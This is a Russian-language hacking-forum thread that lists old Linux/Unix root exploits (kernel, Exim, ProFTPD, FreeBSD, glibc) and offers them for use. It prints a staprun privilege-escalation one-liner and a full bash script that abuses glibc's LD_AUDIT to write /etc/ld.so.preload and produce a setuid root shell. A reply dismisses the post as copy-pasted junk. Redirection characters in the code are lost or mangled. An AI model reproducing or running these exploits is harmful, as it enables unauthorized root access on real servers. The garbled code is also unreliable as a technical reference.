Уважаемые пользователи форума, убедительно просим вас переходить в телеграмм продавца, исключительно по предоставленной ссылке. Проверяйте продавца, отправив сообщение на электронную почту, чтобы убедиться в том, что вы общаетесь действительно с ним.

Linux/Unix Root Эксплоиты, 110219 Добавлено два ProFTPd эксплоита

Тема в разделе "Хакинг. Программирование", создана пользователем mirex, 11 июл 2016.

  1. mirex

    mirex Member

    Сообщения:
    40
    Симпатии:
    0
    Ubuntu 10.10 64-bit and Ubuntu 10.10 32-bit

    Linux Kernel CAP_SYS_ADMIN (32 and 64-bit)
    Kernel Version = 2.6.34 (untested on earlier versions)
    Published: 2011-01-08

    КАП_СИС трудно эксплуатировать.


    #Exim 4.63 (Почта) RedHat/Centos/Debian Remote Root

    Ещё и в Метасплоите

    В декабре 2010 был эффективным, но своё уже отжил. Примечательно что это remote root.


    27-го Ноября 2010 был опубликован следующий эксплоит. Ввиду лёгкой эксплуатации и широкой распространнёности, он является очень полезным. Какие версии уязвимы - неясно, но проверить конкретную машину очень легко.

    Код
    printf “install uprobes /bin/sh” exploit.conf; MODPROBE_OPTIONS=”-C exploit.conf” staprun -u [имя пользователя]




    ProFTPD mod_sql < 1.3.3.D
    Published: 2010-11-18



    ProFTPD < 1.3.3.B
    Published: 2010-11-07



    Linux Kernel <= 2.6.36-rc8 RDS x86

    CVE: 2010-3904
    Published: 2010-10-19



    FreeBSD mbufs() v.7.0-8.*
    26.09.2010




    glibc эксплоит

    Ввиду лёгкой эксплуатации и широкой распространнёности, он является очень полезным.

    отнюдь не широкой. емнип systemtap-runtime по дефолту ставят только в редхате, а на 90% серверов с центосью и подобными rpm-based дистрами этот staprun не установлен.
    и, как обычно, в зузе оно не работает, и не работало даже на момент выхода ыксплоета smile.gif

    glibc эксплоит

    для старого бебиана (вроде <=5.0.5) вот этот удобнее:

    #!/bin/bash
    OUTPUT=/etc/ld.so.preload
    MASK=umask
    umask 0
    LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="$OUTPUT" ping 2 /dev/null
    if [ ! -f $OUTPUT ]; then
    echo "System does not appear to be vulnerable"
    exit 0
    fi
    echo -n $OUTPUT
    umask $MASK
    cat sh.c << EOF
    #include <unistd.h
    #include <stdio.h
    int main (int argc, char **argv, char **envp)
    {
    char *args[] = { "/bin/sh", NULL };
    setuid(geteuid());
    setgid(getegid());
    execve(args[0], args, envp);
    perror("execve failed");
    return 0;
    }
    EOF
    gcc sh.c -o sh
    cat libpwn.c << EOF
    #include <sys/stat.h
    #include <unistd.h
    uid_t getuid (void)
    {
    chown("$PWD/sh", 0, 0);
    chmod("$PWD/sh", S_ISUID|S_IRUSR|S_IWUSR|S_IXUSR|S_IRGRP|S_IXGRP|S_ IROTH|S_IXOTH);
    return 0;
    }
    EOF
    gcc -Wall -fPIC -c libpwn.c
    gcc -shared -Wl,-soname,libpwn.so -o libpwn.so libpwn.o
    echo "$PWD/libpwn.so" $OUTPUT
    ping 2 /dev/null
    echo -n $OUTPUT
    ./sh

    этот ^^^ сплоент для debian-based дистров!

    Статья не моя копиаст с експлоита )
  2. hitesh

    hitesh New Member

    Сообщения:
    25
    Симпатии:
    0
    Ну что это капипаст это ежу понятно и нахера такою бесполезную хрень выкладывать
    Те кто шарят в эксплойтах без проблем любой сплойт на любом языке юзают с баг трекеров
    Те кто шарят в метасплойте им тем более эти эксплойты не нужны так как давно уже есть в
    в базе сплойтов к чему этот шлак здесь ПРЕДЛАГАЮ ДАБЫ НЕ ЗАСОРЯТЬ ФОРУМ НАЧИСЛЯТЬ ШТРАФНЫЕ БАЛЫ ЗА РАЗМЕЩЕНИЕ ТОКОГО МУСОРНОГО МАТ И ПО НАБОРУ БАЛОВ БАНАН ЧТОБЫ НЕ ГАДИЛИ БЕСТОЛКУ КТО ЗА ПЛЮСУЕМ

Поделиться этой страницей